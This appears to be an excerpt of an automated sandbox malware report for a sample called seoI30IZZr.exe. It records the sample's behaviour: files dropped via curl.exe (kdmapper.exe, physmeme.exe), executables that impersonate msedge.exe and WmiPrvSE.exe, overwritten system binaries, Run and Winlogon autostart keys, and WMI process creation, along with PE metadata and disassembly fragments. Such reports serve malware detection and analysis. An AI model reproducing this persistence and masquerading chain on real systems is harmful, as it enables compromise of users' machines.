Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000002.1501843564.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1495581926.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb source: seoI30IZZr.exe
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb66 source: seoI30IZZr.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1507989582.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508229989.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508518215.000001B321131000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507989582.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.7.dr

Source: seoI30IZZr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: seoI30IZZr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: seoI30IZZr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: seoI30IZZr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: seoI30IZZr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF786614760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF786614760

Source: C:\Windows\Speech\kdmapper.exe

File created: C:\Edge\__tmp_rar_sfx_access_check_5785406

Jump to behavior

Source: kdmapper.exe.4.dr

Static PE information: section name: .didat

Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061F640 push ecx; ret	5_2_0061F653
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061EB78 push eax; ret	5_2_0061EB96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00440905 push ecx; retf	12_2_00440906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00452DD9 push eax; retf	12_2_004534E2
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFB4AF34B92 pushad ; retf	16_2_00007FFB4AF34B95
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFB4B328B28 push eax; ret	16_2_00007FFB4B328B29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4ADFD2A5 pushad ; iretd	31_2_00007FFB4ADFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4AF12314 pushad ; iretd	31_2_00007FFB4AF1232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4AFE2316 push 8B485F94h; iretd	31_2_00007FFB4AFE231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AE0D2A5 pushad ; iretd	32_2_00007FFB4AE0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AF20DE0 pushad ; retf	32_2_00007FFB4AF20E0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AF2AA97 push esp; retf	32_2_00007FFB4AF2AA98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AFF4000 push eax; iretd	32_2_00007FFB4AFF4001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AFF2316 push 8B485F93h; iretd	32_2_00007FFB4AFF231B
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF18AC3 push ss; iretd	39_2_00007FFB4AF18AC9
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF1967D push edi; ret	39_2_00007FFB4AF19688
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF04B92 pushad ; retf	39_2_00007FFB4AF04B95
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF37A05 push eax; iretd	39_2_00007FFB4AF37A4D
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF34B92 pushad ; retf	40_2_00007FFB4AF34B95
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF48AC3 push ss; iretd	40_2_00007FFB4AF48AC9
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF4967D push edi; ret	40_2_00007FFB4AF49688
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF67A05 push eax; iretd	40_2_00007FFB4AF67A4D
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 42_2_00007FFB4AF04B92 pushad ; retf	42_2_00007FFB4AF04B95
Source: C:\Edge\msedge.exe	Code function: 51_2_00007FFB4AF24B92 pushad ; retf	51_2_00007FFB4AF24B95
Source: C:\Edge\msedge.exe	Code function: 51_2_00007FFB4B318B28 push eax; ret	51_2_00007FFB4B318B29
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF24B92 pushad ; retf	56_2_00007FFB4AF24B95
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF38AC3 push ss; iretd	56_2_00007FFB4AF38AC9
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF3967D push edi; ret	56_2_00007FFB4AF39688
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF57A05 push eax; iretd	56_2_00007FFB4AF57A4D

Source: msedge.exe.5.dr	Static PE information: section name: .text entropy: 7.556050087022216
Source: physmeme.exe.7.dr	Static PE information: section name: .text entropy: 7.9965850430662675
Source: WmiPrvSE.exe.16.dr	Static PE information: section name: .text entropy: 7.556050087022216

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Executable created and started: C:\Windows\Speech\physmeme.exe			Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Executable created and started: C:\Windows\Speech\kdmapper.exe			Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\jsWPmlvb.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\KiGKqBgX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\oYbYVUjG.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\AznuGYbp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\AppData\Local\WmiPrvSE.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\rWfFWfLI.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Windows\Speech\kdmapper.exe	File created: C:\Edge\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\EagcoYZU.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\OJAsYAeC.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\IlfCUBRc.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ERJdElGX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\mOEXVCEF.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\IlfCUBRc.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\KiGKqBgX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\AznuGYbp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\rWfFWfLI.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\jsWPmlvb.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ERJdElGX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\OJAsYAeC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\EagcoYZU.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\oYbYVUjG.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\mOEXVCEF.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE			Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
